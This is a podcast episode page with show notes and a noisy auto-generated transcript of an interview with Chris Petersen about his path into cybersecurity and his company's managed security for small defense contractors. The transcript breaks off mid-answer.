Ever wondered how a degree in accounting could lead to a thriving career in cybersecurity? Join us as Chris Petersen shares his riveting journey from Colorado State University to becoming a cybersecurity expert. Initially hesitant to dive into engineering, Chris leveraged his minor in accounting information systems and a golden opportunity at Price water house to pivot into IT. His story underscores the importance of adaptability and seizing opportunities, offering invaluable insights for anyone contemplating a career shift in the tech industry.
Small and medium-sized businesses (SMBs) in critical sectors often find themselves in the crosshairs of cyber adversaries. Chris and our hosts dissect the pressing cybersecurity challenges these businesses face, especially those in the defense industrial base. Learn about Radical's mission to democratize enterprise-level security through cloud technology and AI, making it affordable for vulnerable companies. We also discuss how upcoming regulations mandating third-party cybersecurity assessments could change the landscape, ensuring that contractors handling sensitive information are adequately protected.
Finally, we tackle the evolving threats in the defense industry and the necessity for advanced threat detection and attribution. Chris offers an insider's perspective on the methodologies employed to counteract these sophisticated attacks. We also delve into the controversial topic of a national digital ID system, debating its potential to combat identity fraud and deep fakes while navigating the intricate balance between security and privacy. This episode is packed with critical information and actionable insights, making it a must-listen for anyone invested in the future of cybersecurity and digital identity.
https://radicl.com/
Follow the Podcast on Social Media!
Instagram: https://www.instagram.com/secunfpodcast/
Twitter: https://twitter.com/SecUnfPodcast
Patreon: https://www.patreon.com/SecurityUnfilteredPodcast
YouTube: https://www.youtube.com/@securityunfilteredpodcast
TikTok: Not today China! Not today
Speaker 1: How's it going everyone?
00:00:01
So, before we dive into the episode, I really want to say
00:00:06
thank you to everyone that is listening in, that's tuning in,
00:00:09
that's enjoying this content and getting value from it.
00:00:11
I really love that.
00:00:13
That's why I do it following the podcast, and I really want
00:00:26
to encourage you to please follow and subscribe the podcast
00:00:28
on whatever platform you are listening or viewing this on.
00:00:31
It really helps out the podcast , it helps out the algorithm, it
00:00:34
helps more people hear this content that you already find
00:00:38
helpful and that they hopefully will as well.
00:00:41
So, if you go ahead and subscribe or follow the podcast
00:00:44
on any platform that you're listening on and please share it
00:00:47
with your friends, that'd be great.
00:00:50
All right, thanks everyone.
00:00:51
Let's get into the episode.
00:00:52
How's it going?
00:00:54
Chris, it's great to have you on the podcast.
00:00:57
I'm really looking forward to our conversation today.
00:01:00
Speaker 2: Yeah, thanks, Joe Great to be here.
00:01:17
Speaker 1: Yeah, absolutely so, chris.
00:01:18
You know I start everyone Great to be here time.
00:01:20
You know I remember when I was making that jump and all that I
00:01:25
needed to hear was that someone else did it from a similar
00:01:28
background, so that I could tell myself, like, hey, this is
00:01:31
possible.
00:01:32
You know, this is something that I can actually go down and
00:01:35
achieve.
00:01:36
So what's your story?
00:01:38
You know what made you interested in IT.
00:01:40
What made you, you know, go down this path IT.
00:01:42
What made you go down this path ?
00:01:45
Speaker 2: Yeah, I mean I guess I had a pretty non-traditional,
00:01:47
circuitous route to cybersecurity, certainly, and
00:01:51
even IT.
00:01:51
I graduated from Colorado State University with an accounting
00:01:57
degree.
00:01:57
I had wisely chosen to get a talent and trade for a minor in
00:02:04
accounting, information systems.
00:02:05
That was, I'd say, one of the you know a few good sources I
00:02:10
met in college but that ended up serving me well.
00:02:13
So I managed to get done at Pricewaterhouse.
00:02:16
There's a pretty good story behind that.
00:02:18
You know got into a really good firm and they kind of I got
00:02:24
into a really good firm.
00:02:25
I got there because of that concentration.
00:02:27
They needed somebody to help them deploy clients for
00:02:29
technology or place a mainframe application.
00:02:31
They said, hey, you're accounting, you've got systems,
00:02:34
we'll train you and see if you can do this.
00:02:36
And it turned out I was pretty good at it.
00:02:38
So I did that for about a year.
00:02:40
So I got trained out of paper stuff that quick and learned on
00:02:44
the job.
00:02:44
Um, staying in training that paper stuff that quick and
00:02:48
learned on the job and um, and then actually I went back to the
00:02:50
evangel auditor for a year, found out that wasn't really all
00:02:53
that appealing to me and then learned about their it audit
00:02:57
practice and began to pursue that and that's next time, I
00:03:01
think got me more into the into the audit side and more the IT
00:03:05
side, and that then kind of really propelled me more along
00:03:09
the IT and cybersecurity path and again those softwares and
00:03:14
tooling to try to automate things that I wanted to automate
00:03:16
, and I had an act for that as well on the software side.
00:03:19
And you know, I think just those early experiences, just
00:03:24
you know, being asked to go learn, get your stuff out, and
00:03:27
being presented with the opportunity to go throwing hand
00:03:29
in technology, is what really shaped my career.
00:03:36
Speaker 1: That's really fascinating.
00:03:37
You know, when you were getting your degree, did you see that
00:03:42
specialty or that focus of information systems as the
00:03:46
future?
00:03:46
You know, did you see that and say I could see, you know,
00:03:49
computers and IT systems becoming a thing in the future?
00:03:53
I'm going to go down this route , or was it kind of more
00:03:55
happenstance?
00:03:58
Speaker 2: Yeah, I mean it was.
00:03:58
You know a little bit of both.
00:04:00
I mean I'm kind of.
00:04:01
I mean I was always.
00:04:02
I always I was definitely a high-leverager.
00:04:07
You know technology.
00:04:08
I sat around computers and things like that when I was
00:04:11
younger.
00:04:12
So I was a very more advanced tinkerer than most and I chose
00:04:19
accounting because, honestly, I was too lazy to do all the hard
00:04:21
work in engineering.
00:04:22
I started at CSU and as an engineering major and I got
00:04:27
another top two and three.
00:04:29
It's like, oh my gosh, this is going to be a lot of work.
00:04:31
I'm going to have to get to the bottom of the study, um, and
00:04:34
then I said I, I went to Cali, dats, I do I, but I did this
00:04:43
kind of, I think, saw a little bit of the right in the wrong in
00:04:45
terms of system was going to be and technology was going to be
00:04:49
driving the future economy and the future of business.
00:04:53
I did make a choice to go pursue that concentration for
00:04:57
that reason and I had to take care of my technology.
00:05:01
Speaker 1: Oh yeah, when I was in college I had a friend that
00:05:05
went down the engineering path.
00:05:06
I think it was like the mechanical engineering path and
00:05:10
you know he would talk to me about, like the math classes and
00:05:13
the physics classes that he'd have to take and, like man, like
00:05:16
I enjoy calc one, but I don't know if I enjoy, like you know,
00:05:20
five steps above that.
00:05:21
Um, it's, it's.
00:05:23
It's an insane amount of work and I feel like it's really hard
00:05:26
to kind of figure out what that work is going to be like until
00:05:30
you get into it.
00:05:31
But it's just, it's an insane amount of work.
00:05:34
You're nonstop studying.
00:05:38
Speaker 2: You are.
00:05:38
Yes, it's a different level of you know, especially when the
00:05:42
schools, at least CSU, they put you know, especially when the
00:05:44
school, at least CSU they put you know, they kind of weed out
00:05:49
when we farted by having physics at 8 in the morning, and so if
00:05:55
you're willing to get up at 8 in the morning and go do physics,
00:05:58
you probably shouldn't be pursuing engineering, and so
00:06:01
that did also help to weed me out.
00:06:03
Yeah, yeah, thinking back back I can't my boys watch this
00:06:09
episode.
00:06:10
That's not good.
00:06:10
Speaker 1: I'm saying too much yeah, thinking back, it was uh,
00:06:15
that is interesting.
00:06:16
The all those hard classes were pretty early in the morning too
00:06:20
.
00:06:20
For for my uh program, you know , I tried to go pre-med at first
00:06:25
, right, so you have to take, like chemistry and physics and
00:06:27
you know, calculus and all all those fun classes and all the
00:06:32
hard ones were in the morning.
00:06:34
It seemed like 8 am, 7 am, there was no breaks.
00:06:38
I think that that helped.
00:06:40
That definitely helped.
00:06:41
Speaker 2: Weed me out now that you bring that up, I think that
00:06:44
definitely helped I think it's deliverance probably smart,
00:06:47
right, it's kind of like what if you're not willing, you know,
00:06:49
now to go do this, you know, yeah, like four more years of
00:06:52
this.
00:06:52
Speaker 1: So you know, buckle up right, yeah, if you're not
00:06:56
willing to do it now, then you're definitely not going to
00:06:59
be willing to do the hard stuff when we actually get to it yeah,
00:07:02
that's right, it's a lot of sense.
00:07:04
Did, uh, did you kind of you know, talk to me about that
00:07:08
opportunity of being handed you know new things to figure out?
00:07:12
Right, were you?
00:07:13
Were you nervous, were you going through imposter syndrome
00:07:17
at the time?
00:07:17
Because I remember when I was, you know, handed new things to
00:07:22
figure out for myself, I felt like I was you know an imposter.
00:07:28
Surely, in this project they're going to figure out, I'm not
00:07:32
the person that they should have hired, you know, and I'm going
00:07:34
to be shown the door and things like that.
00:07:36
Right, did you go through something similar or not?
00:07:40
Speaker 2: Yes, yes, in multiple different ways, you know for
00:07:51
sure.
00:07:51
I mean we just started.
00:07:52
I mean I was showing up this down.
00:07:53
When you work for a firm like pricewaterhouse people, you know
00:07:54
the expectations are pretty high, um, and you know, I think
00:07:57
it's like I kind of had an interesting path in there, but
00:08:00
so I I had kind of overcome that through my great along, you
00:08:03
know, or a firm like that, and so I had a bit of, I'd say,
00:08:11
insecurity or imposter syndrome for a while until I dug down my
00:08:13
feet in an early phase.
00:08:14
But yeah, I mean, yeah, I really loved about that
00:08:16
experience and some of this was because the field was very new.
00:08:21
You know, it audit, edp audit, it security it was a version you
00:08:24
built on an IT audit.
00:08:25
There really wasn't internet security at that time.
00:08:28
I was kind of right there when IT audit was becoming internet
00:08:32
security and Cork America was connecting their networks to the
00:08:36
internet or thinking about doing that, trying to figure out
00:08:38
is this a good idea or not?
00:08:39
Hey, there's a thing called a firewall.
00:08:41
Should we get a firewall?
00:08:43
So I was kind of there at that time and and so I was often
00:08:51
asked to go in and assess things or figure stuff out.
00:08:53
You could do an database security assessment or
00:08:55
application security assessment or a junk fulls review and like,
00:08:59
here's your list of things to go look at.
00:09:01
There's something else put down before you and some structure
00:09:04
there, or we don't have that yet .
00:09:06
And go to Barnes Noble and go buy a book and figure it out and
00:09:09
show up the next day as an Oracle audit expert.
00:09:13
And so I have to go do those things and go on the fly, read,
00:09:20
learn and try to go show up with some printed people who were
00:09:26
doing things like Oracle DBAs, as that was their job and
00:09:30
profession.
00:09:31
So it was a lot of pressure.
00:09:33
I guess I was pretty good at picking things up pretty quickly
00:09:37
and synthesizing knowledge and they had to account for it.
00:09:43
But yeah, there's a lot of times it was their right and
00:09:46
going in just not knowing if somebody could call my bluff and
00:09:48
just be like, hey, yeah, you're , you really don't know what
00:09:52
you're talking about.
00:09:52
It's pretty clear, let me, let me school you up.
00:09:55
But yeah, often, even when they knew that, yeah, yeah, a lot of
00:09:58
you know people are best only kind of know like, yeah, you're
00:10:00
so figured stuff out yourself and you're, you're doing a job,
00:10:03
so there's also some grace given yeah, that's a.
00:10:09
Speaker 1: it's an interesting skill to have and develop.
00:10:12
Right is being you're being paid for to be the smee, but you're
00:10:18
not really the smee, yeah, and you're trying to figure things
00:10:21
out, right, and you can kind of get by with using the right
00:10:25
words, using the right terminology and whatnot right.
00:10:28
But when it comes to hands-on keyboard technical perspective,
00:10:32
you may need a little bit of assistance and whatnot.
00:10:35
And it's an interesting environment, right, because I
00:10:40
remember when I was starting to go, you know, on client calls to
00:10:46
different federal agencies I mean I was early on in my career
00:10:50
, I didn't know what, I didn't even know Trying to be the SME
00:10:55
in that environment.
00:10:56
I mean you have the guy wrote the vulnerability scan software
00:11:00
that you're using right there at the desk and you're saying you
00:11:04
at the desk and you're saying you know contradicting things
00:11:06
and it's, um, it's definitely a learning experience.
00:11:10
Did you, do you look back at those skills that you, you know,
00:11:16
learn working under that pressure and do you think that
00:11:18
it benefits you now?
00:11:19
How?
00:11:20
How has it benefited you or changed your mentality towards
00:11:25
you know, adverse conditions and new problems that are coming up
00:11:29
in the modern world within your new you know company and role?
00:11:35
Speaker 2: Yeah, I mean it definitely saved me.
00:11:36
I think it helped install me high, you know, high
00:11:41
self-efficacy, you know kind of notion that I just had.
00:11:44
I believe I can figure stuff out, and so I was forced to do
00:11:50
that and I did.
00:11:51
I think, just generally speaking for people early in
00:11:58
their career, I think just that philosophy of figure it out,
00:12:01
there's so much, there's so much , there's never a better
00:12:06
resource of knowledge and intelligence like there is today
00:12:11
.
00:12:11
And so, you know, be curious, go learn, figure stuff out, just
00:12:16
be willing to just go out there and take a risk as well, push
00:12:21
the envelope.
00:12:21
But yeah, for me I think that instills a lot of high
00:12:25
self-advocacy and also just the notion of what's been figured
00:12:27
out, I figured out.
00:12:29
And I've been a lifelong learner in my profession.
00:12:32
Through all those other jobs that I had, I was always being
00:12:35
pushed forward in roles I wasn't really qualified yet to do and
00:12:39
always, you know, being in competence and the same thing
00:12:44
that I, you know, found the, you know found the law rhythm, and
00:12:48
you know that was every single year being pushed to to grow and
00:12:51
to scale and to pick up new skills, whether the technical
00:12:53
side or leadership side, managerial side, strategy.
00:12:56
Um, you know, it was just and you have to figure stuff out.
00:13:01
Now I'm doing that same thing in Radical as well and it's fun.
00:13:09
It's challenging, stressful at times.
00:13:11
You know you're not just doing the things.
00:13:12
You know in a beer every day and some great stress, and some
00:13:13
days the stress gets to me more than others, but I'm always glad
00:13:17
that I continue to grow and learn.
00:13:22
Speaker 1: So talk to me about Radical.
00:13:23
You know what do you guys focus on?
00:13:26
What's the area of expertise within the security world?
00:13:43
Speaker 2: the defense industrial base and US critical
00:13:45
infrastructure.
00:13:47
That's the fundamental goal, that's the mission, and for us,
00:13:53
we're going about that by trying to secure the S&B segment.
00:13:57
Companies, under-clad employees, these companies that serve
00:14:03
defense supply chains, serve critical infrastructure, they
00:14:06
are being actively targeted by nation state threats, atts, I
00:14:11
believe a lot of them are lightly you know, actively
00:14:14
compromised.
00:14:14
And because this is this is nation state espionage, it's
00:14:19
also, it's also cyber warfare and it's posturing and it's
00:14:23
preparing for future conflicts.
00:14:25
And these companies, they're involved in it.
00:14:30
They typically have not had the defensive arsenal and
00:14:37
capability set to actually defend themselves against that
00:14:39
classic adversary due to cost and complexity.
00:14:42
So we're trying to bring a very advanced, more like enterprise,
00:14:46
big bank-grade cyber security defenses to this segment.
00:14:52
And so for us, that is, you know, managing their attack
00:14:57
surface, shrinking it across time, and then it's also
00:15:00
handling their threat detection and its response capabilities,
00:15:04
making sure that press don't go on scene, on the art scene they
00:15:08
can investigate and also any damage to its response very,
00:15:10
very quickly, and trying to do all of that in a way that's easy
00:15:17
for them to consume and a price point that they can actually
00:15:19
afford to pay.
00:15:22
Speaker 1: Yeah, it's a fascinating area because it's
00:15:28
often not even looked at, not even thought about.
00:15:30
You know this, uh, these really small, tiny companies that
00:15:35
don't have the budget to pay for you know a solution like crowd
00:15:39
strike or splunk right or whatever it might be.
00:15:43
Uh, you know how are they protecting themselves because
00:15:48
you know they, they may be a small business and they have one
00:15:50
or two government contracts and those one or two government
00:15:54
contracts might be designing, you know, the radar system for a
00:15:57
nuclear sub.
00:15:57
It's, it's interesting what the government will trust with
00:16:03
smaller businesses, you know, to do for them and it makes sense
00:16:06
why they do it.
00:16:07
Right, you kind of want to disperse out these different
00:16:11
systems and have different manufacturers and different R&D
00:16:14
processes and whatnot.
00:16:17
But at the same time, it does open you up to risk, because I
00:16:21
remember actually reading an article where, you know, the FBI
00:16:26
identified that, you know, a foreign adversary was
00:16:29
infiltrating the power grid via a small business.
00:16:33
It was literally this guy and his wife, you know, owned and
00:16:37
ran this business and he would go out and work on the power
00:16:40
grid at a substation that was, you know, nearby his place of
00:16:45
residence.
00:16:46
Even, right, it's in the middle of the country in the middle of
00:16:48
nowhere, you know, like Montana or something like that, right,
00:16:51
and they identified that, you know, the country's power grid
00:16:54
was being infiltrated by this small business.
00:16:56
Well, this guy doesn't know anything about cybersecurity.
00:16:58
Like, when the FBI showed up at his door, he was confused as to
00:17:02
, you know, like, how is this even possible?
00:17:05
You know, like, I bought a laptop from Dell it was a new
00:17:07
laptop, I don't know what to tell you I hook it up Like this
00:17:11
is what I do, and, um, you know, he couldn't even he couldn't
00:17:15
even wrap his head around what it was that was going on.
00:17:18
And so it's a, it's a sector of the market that, in my, is
00:17:24
often overlooked, you know, in terms of cybersecurity, but it's
00:17:28
a place where we're probably the most vulnerable.
00:17:33
Speaker 2: Agreed, yeah, and I've, you know, I've been
00:17:35
concerned about that for a long time and that's been, you know,
00:17:38
past the mind, especially that you know it was also the impetus
00:17:41
for starting LogRhythm as well, kind of that same concern, but,
00:17:50
yeah, it's overlooked.
00:17:51
It is overlooked.
00:17:52
I think it's overlooked in terms of the vendor side, you
00:17:56
know, because the challenge with this market is it's hard to
00:17:59
make money there, right.
00:18:00
And as for us, the tunnel challenge that we have, I think
00:18:03
we can do it because technology has evolved in a way where we
00:18:05
can get to a solution that can be affordable and also high
00:18:10
quality, based on cloud and AI and just the modern tech
00:18:17
situation.
00:18:18
But in the past that hasn't been possible.
00:18:21
So, from the vendor perspective , they have often been
00:18:23
overlooked.
00:18:24
The government has not been overlooked and they've been very
00:18:27
concerned for a while.
00:18:28
It has various clauses, key clauses.
00:18:30
You know C-724, I mean a key one, where they're supposed to
00:18:34
comply with the J-171, which is a pretty rigorous compliance
00:18:37
framework.
00:18:37
The challenge has been there's not been enforced of it.
00:18:41
And there's self-reporting and companies can self-assess every
00:18:47
three years and there's a score, or a score is not necessarily
00:18:51
really evaluated in terms of their ability to contract
00:18:56
currently, and so there isn't an economic incentive to invest in
00:19:01
cybersecurity where it hasn't been.
00:19:04
One is coming with the cybersecurity and material
00:19:07
modification process, where that will actually be a compliance
00:19:12
methodology that will have teeth and independent third-party
00:19:17
assessments and that will hopefully level the playing
00:19:24
field so that all companies need to invest the appropriate
00:19:27
resources to actually be secure if they're handling what's
00:19:31
called full-time information recouping, which is the
00:19:36
near-sensitive stuff that the government must make sure gets
00:19:39
protected.
00:19:41
So there's been focus on it.
00:19:43
It's just the challenge has been government moves slowly, um
00:19:46
, there's no enforcement model and these are small companies.
00:19:50
They've got businesses to run, they've got employees to pay and
00:19:53
they're already working on narrow margins and and so they
00:19:57
can't.
00:19:57
You know, they can't justify to spend the size of security
00:20:00
because no economic benefit.
00:20:01
Um, and others could just say I'm not going to spend it and
00:20:05
therefore I'll underbid you on price, right.
00:20:07
So what CEO's going to say I'm going to allocate 5% of my
00:20:11
budget to cybersecurity when CEO is not going to do that, or
00:20:14
competitors?
00:20:15
Now everything I do is more expensive than that, and so it's
00:20:20
kind of an economic model that is, I think, broken right now.
00:20:25
That is ultimately driving the underspend and underdelivered
00:20:31
side room assignment.
00:20:34
Speaker 1: Yeah, that makes sense.
00:20:35
Was there an experience you know previously in your career
00:20:40
that you know kind of opened you up to this whole problem within
00:20:45
the sector?
00:20:49
Speaker 2: well, I mean, you know.
00:20:50
I mean I'm a patriot.
00:20:55
I never served myself in the military.
00:20:59
My grandfather served, my dad served and I, you know I love
00:21:05
our country.
00:21:05
You know the country is not perfect.
00:21:08
We've got things to go work on, as does every nation, but I
00:21:13
believe it's a great nation and once you protect it.
00:21:17
And so that's really the root of it.
00:21:20
It's me wanting to help serve my nation through the skills
00:21:29
that I have, the talents that God's given me.
00:21:33
Speaker 1: Yeah, that's so fascinating, right?
00:21:35
Because it's fascinating because, you know, at one point
00:21:39
in time, right, I wanted to go into, like, the federal sector
00:21:43
and work for different agencies and whatnot.
00:21:45
It never panned out for me for one reason or another, right,
00:21:50
like there's a million reasons why you can be disqualified from
00:21:54
these processes.
00:21:55
And it was always so very frustrating to me, right,
00:21:58
because I was told at one point in time oh, you're too young,
00:22:01
you got to wait until you're 30, right, and my response was you
00:22:05
do understand that, like, I'm literally willing to hop on a
00:22:08
plane to go to Afghanistan right now.
00:22:10
Like, right now, if you tell me where to show up, I'll go, but
00:22:14
when I'm 30, I'll probably have kids, I'll probably be married,
00:22:18
there's no way I'm hopping on that plane.
00:22:19
Use me now.
00:22:23
It never really panned out, for one reason or another, probably
00:22:26
for the better, I guess.
00:22:28
But it's interesting for me to see how people you know get into
00:22:34
this world, right, because you're kind of in a quasi space
00:22:37
where you're where you're kind of, you know, one foot in one
00:22:41
world, one foot in the other world, and you're trying to help
00:22:45
both worlds, I guess yeah, yeah and yeah, I mean, indeed, I
00:22:51
think, people in cyber security generally.
00:22:53
Speaker 2: I mean it's kind of, you know, it's cops versus
00:22:55
robbers, a little bit right.
00:22:56
It's it's kind of good guys versus bad guys, and so I think
00:23:00
a lot of the citizens feel we're in it because you know we want
00:23:03
to help protect and and, by the way, get back, um, if there are.
00:23:08
There are adversaries and threats out there that they're
00:23:10
seeking, but you are, whether Whether that's at a nation state
00:23:14
level or it's ransomware that might jeopardize a family-run
00:23:20
business that's been around for 100 years.
00:23:22
10, 20, 100 employees, other paychecks None of that's good.
00:23:28
I think a lot of folks in this industry care about that and
00:23:32
want to just get in.
00:23:33
You're getting away of those, those threats how?
00:23:37
Speaker 1: so how are you able to create a solution that is
00:23:42
cost effective for these smaller businesses to use?
00:23:45
That, you know, provides, uh, these advanced capabilities?
00:23:49
The reason why I ask is because I'm over here, I'm looking at
00:23:52
my CrowdStrike renewal and I mean it's an arm and a leg right
00:23:57
and they offer similar stuff, but it's not geared towards
00:24:02
smaller businesses.
00:24:03
I remember when I was working for a much smaller company,
00:24:07
somewhere around 50 people, and we had government contracts, I I
00:24:12
guess very naively, you know approached my, my vp saying, hey
00:24:16
, we should get something like crowd strike on our machines.
00:24:19
And you know whatnot.
00:24:20
He looked at the pricing.
00:24:21
He's like, hey, this is like double our it budget.
00:24:24
You know, like we can't do this yeah, now that is.
00:24:29
Speaker 2: That is a fundamental challenge.
00:24:31
So so part of it is we are CrowdStrike partners, we work
00:24:34
with CrowdStrike and CrowdStrike has programs that align for the
00:24:40
SMB.
00:24:40
So that helps us out, helps the customers out.
00:24:43
But I think it turns out in this particular site and it
00:24:48
starts with one, yes is making it easy.
00:24:50
The ads can be easy to adopt, rapid to adopt, and part of that
00:24:56
is we can't assume that they've got a bunch of people on their
00:25:01
team who want to spend time doing security or even IT, and
00:25:05
so we've got to take it off their plate.
00:25:06
And that's part of what we've built.
00:25:08
And so we've built a platform that allows us to become
00:25:13
seamlessly their security operations team as well as our
00:25:16
compliance operations team, so we have an compliance side as
00:25:19
well, and so through our platform, we are able to drive
00:25:25
their tax service management process right.
00:25:27
So we are scanning for vulnerabilities on their behalf,
00:25:30
identifying configuration weaknesses.
00:25:32
We're doing security awareness training.
00:25:34
We're just delivering all of that to them through our
00:25:37
platform and I'm helping them just over time on the ASM side,
00:25:42
shrink the attack surface, where all they have to do is just
00:25:46
pass the things we tell them to pass across time and we can dole
00:25:49
that out in bite-sized chunks so we're not overwhelming them.
00:25:55
On the front side, we're the ones that are monitoring
00:25:59
anything that CrowdStrike would tell us about.
00:26:02
We're also pulling other data from sources like OPCD Plotter,
00:26:06
google Workspace and running our own text analytics against it.
00:26:09
If we see something, we triage it, we investigate.
00:26:13
If there's an incident, we then manage the response process.
00:26:16
We pull the customer in if we need to for our platform by
00:26:20
tasking them to do certain things with clear guidance, and
00:26:26
in SMBs, that person is being tasked off an MSP we use running
00:26:30
their IT.
00:26:30
Our platform allows us to task either the MSP or the internal
00:26:35
IT and also keep their CEO or CEO in front of everything going
00:26:39
on, and so that's how we've approached this.
00:26:42
It's kind of this platform-led delivery where we can become
00:26:47
that team seamlessly, high transparency, where very quickly
00:26:52
it's in place.
00:26:53
I mean we go and employ within a day, we're collecting data,
00:26:58
we've got visibility and we're monitoring and we're beginning
00:27:01
to identify vulnerabilities and beginning to work on our plan to
00:27:04
shore those up across time.
00:27:05
And the reason we can do that more affordably than in the past
00:27:13
is we know a lot about security analytics.
00:27:18
That's Mike Akron.
00:27:19
I'll honor them.
00:27:20
My co-founder is my brother.
00:27:22
He was 25 there.
00:27:24
We know a lot of platforms allow us to better use data,
00:27:26
both for detection as well as workflow automation.
00:27:28
Us to better use data, both for detection as well as workflow
00:27:31
automation.
00:27:32
As you can imagine, we're building a lot in our backend
00:27:36
platform that allows us to unleash the potential of data.
00:27:40
It also allows us to unleash the potential of AI as well, to
00:27:44
then increasingly automate things that humans have to do
00:27:48
today.
00:27:48
That is the technical side of how we get to a hyper-efficient
00:27:55
scale that allows us to have a very affordable price point.
00:27:59
Ultimately, ai is taking over more and more of the things that
00:28:04
have to be done.
00:28:05
It had to be done by a human operator.
00:28:12
Speaker 1: Yeah, that's really interesting.
00:28:14
It seems like that's probably the only way that you can really
00:28:18
penetrate into this market and really help them out is to being
00:28:22
able to augment a huge portion of that IT responsibility for
00:28:28
that company.
00:28:29
That makes a lot of sense.
00:28:31
Have you, out of curiosity, for that company?
00:28:33
That makes a lot of sense?
00:28:33
Have you, you know, out of curiosity, have you seen an
00:28:35
increase of either attacks or type of attacks against you know
00:28:41
, some of these smaller companies in correlation to
00:28:44
other world events, right?
00:28:45
So you know I'm thinking of, you know, different tariffs that
00:28:48
might be imposed on China or the Ukraine war that's going on,
00:28:52
right?
00:28:52
Did you see an increase of these kinds of attacks?
00:28:56
Even you know preliminary attacks, right?
00:29:00
Because?
00:29:00
I ask because before Russia invaded Ukraine the second time
00:29:05
here, you know, months beforehand they were attacking
00:29:09
Ukraine and, you know, trying to cause different havoc with
00:29:12
different cyber attacks before an actual kinetic attack
00:29:16
occurred.
00:29:17
Speaker 2: Yeah, yeah, I mean it's hard.
00:29:19
I say empirically that we have seen an increase in frequency.
00:29:26
We have certainly seen an increase in the targeted tactics
00:29:30
.
00:29:30
Have certainly seen an increase in the targeted tactics.
00:29:31
One of the things that we do, because we're a defense industry
00:29:35
base, is we tie into various intelligence channels and we
00:29:40
have noticed tactics that are emerging that are being used by
00:29:47
various agency actors to target and penetrate this class of
00:29:51
company.
00:29:52
We go then hunt for any IOCs for those given tactics, and
00:30:02
that's one thing.
00:30:03
We have seen more emergence of more recently aroused
00:30:09
geopolitical events.
00:30:10
I think that will only continue .
00:30:14
Speaker 1: So I think that will only continue.
00:30:16
So I think one major question that the industry is facing is
00:30:20
you know, once you've been breached or attacked in a
00:30:24
certain way, how are you going to ensure that the attackers are
00:30:28
out of the system?
00:30:28
Is there a way that you could potentially walk me through how
00:30:34
that happens, like how you can, you know, provide some sort of
00:30:38
clarity around that, because that's even a difficult question
00:30:42
for me and I'm in the industry.
00:30:43
But a friend of mine who was a director at a company said that
00:30:48
they were recently breached and and his first question to me was
00:30:52
how do I know that they're even gone?
00:30:54
You know, like I don't know right, and it's a difficult
00:30:58
question to answer.
00:31:01
Speaker 2: It is, and so, yeah, we are doing this.
00:31:02
It's not always possible, but if we are able to identify a
00:31:09
certain tactic or a tactic that is either successful or
00:31:13
unsuccessful, that we might need to manually hunt for on an
00:31:17
occasion, we can take the learnings from actually an
00:31:25
active incident or a precedent and we can instrument those
00:31:31
learnings in detection rules and CrowdStrike is a very capable
00:31:37
detection engine on the endpoint and so we develop our own
00:31:42
bespoke traffic detection rules that will leverage the
00:31:46
intelligence gained through threat hunting or incident
00:31:49
response efforts, and we'll do the same in our own proprietary
00:31:54
detection pipeline, which is analyzing other forms of data,
00:31:57
to take this visibility beyond the endpoint.
00:31:59
So that's a big part of what we strive to do whenever possible
00:32:05
is we have a step in our sequence called free critical
00:32:10
resiliency, and so in our workflow, in our virtual SOC,
00:32:15
resiliency is where we take those learnings and we would try
00:32:18
to put things in place.
00:32:19
That would be that would trigger.
00:32:21
If you ever saw that same tactic you know employed again,
00:32:27
or a similar indicator emerged in the environment that might
00:32:30
point to that threat did leave something behind Because that's
00:32:34
a challenge is these very advanced threats.
00:32:40
If they are allowed to get in and stay in, they will leave
00:32:44
behind backboards that might awaken six months, nine months
00:32:48
later, and it would be hard to suss out if they go live again.
00:32:52
But the things that we learn, though, can at least help us
00:32:57
maybe find an indicator that starts to peak in, or peak in a
00:33:02
peak.
00:33:02
There it becomes actively concealing environment.
00:33:06
Speaker 1: Hmm, are you potentially at this point with
00:33:11
enough data and I'm not saying that you have enough data or
00:33:14
anything like that, right, but when you see an attack occur in
00:33:19
an environment and you get it out of the environment and
00:33:21
you're creating those rules, are you able to potentially even
00:33:27
adjust the attack parameters and say, oh okay, they might tweak
00:33:32
it like this if they try again, or they may adjust.
00:33:35
You know this thing over here.
00:33:37
Whatever it might be, are you also making those adjustments up
00:33:41
ahead to make future attacks even more significantly
00:33:45
difficult for the attacker?
00:33:47
Or maybe I'm just spitballing and right like I don't know what
00:33:51
I'm talking about.
00:33:53
Speaker 2: Yeah, no, when possible we will.
00:33:55
So we're generally trying to detect the general tactic and
00:34:02
patterns we might observe in data that would indicate that
00:34:05
that tactic is in use versus a very specific IOC which across
00:34:11
time might change or might be different in a different
00:34:14
environment.
00:34:15
And so that we're trying to those.
00:34:19
Rules are trying to build more on a tactic level which should
00:34:25
be broader in nature and allows to detect a similar method of
00:34:31
attack in going forward, regardless of the environment or
00:34:35
the specific technical details of the instance of that attack
00:34:41
yeah, that makes sense.
00:34:44
Speaker 1: Well, have you potentially seen different tech
00:34:47
attributes, right, or methodologies that that kind of
00:34:51
correlate to a nation-state actor, the?
00:34:53
The reason why I say this right or ask this question is because
00:34:57
you know a lot of the times when a report's released about
00:35:00
reports, release about an after action event, right, a breach
00:35:05
happens of some, some, some you know situation and they always
00:35:12
tend to leave out you know the attributed nation states that
00:35:16
they believe it came from or anything like that.
00:35:18
And in security, you know, I still feel like there's
00:35:22
different techniques that Russia would use versus the US or
00:35:28
versus China or versus Iran.
00:35:29
There's different methods of doing these things and these
00:35:32
different nations.
00:35:33
They have different priorities and different attack
00:35:37
methodologies.
00:35:37
Right, like where Russia will just hack into the power grid
00:35:41
and, like you know, blatantly take over your screen and move
00:35:45
your mouse around.
00:35:46
Right, like they did in 2014, where the US isn't known for
00:35:50
doing that as much.
00:35:52
They're more from the passive, gather the intelligence and then
00:35:56
use it at a later time.
00:35:57
Are you able to see those sorts of attributes as well to these
00:36:03
attacks?
00:36:06
Speaker 2: Yeah, yeah, I think the reality is a nation state,
00:36:16
or really any threat actor, is only going to work as far as
00:36:19
they need to.
00:36:20
So they're going to start with more highly automated attacks
00:36:24
and tools, things that are taking advantage of commonly
00:36:29
known, you know, weaknesses and vulnerabilities.
00:36:31
If that doesn't, you know, work , then they're going to start to
00:36:35
go more specific and maybe start launching some more
00:36:38
targeted phishing or phishing, you know, CFD type campaigns to
00:36:40
see if they can, you know, use or make a mistake campaigns to
00:36:42
see if they can, you know, either make a mistake, and if
00:36:47
that doesn't work, then they might begin to deploy more.
00:36:50
You know novel tactics right, and you know so.
00:36:53
And this is where nation-states , you know, have more
00:36:56
wherewithal because you know and they're nation-states from the
00:36:59
practice of harvesting zero days They've got teams of very smart
00:37:05
users who will scour through open source code repositories or
00:37:12
take closed source systems and try to find weaknesses in those
00:37:18
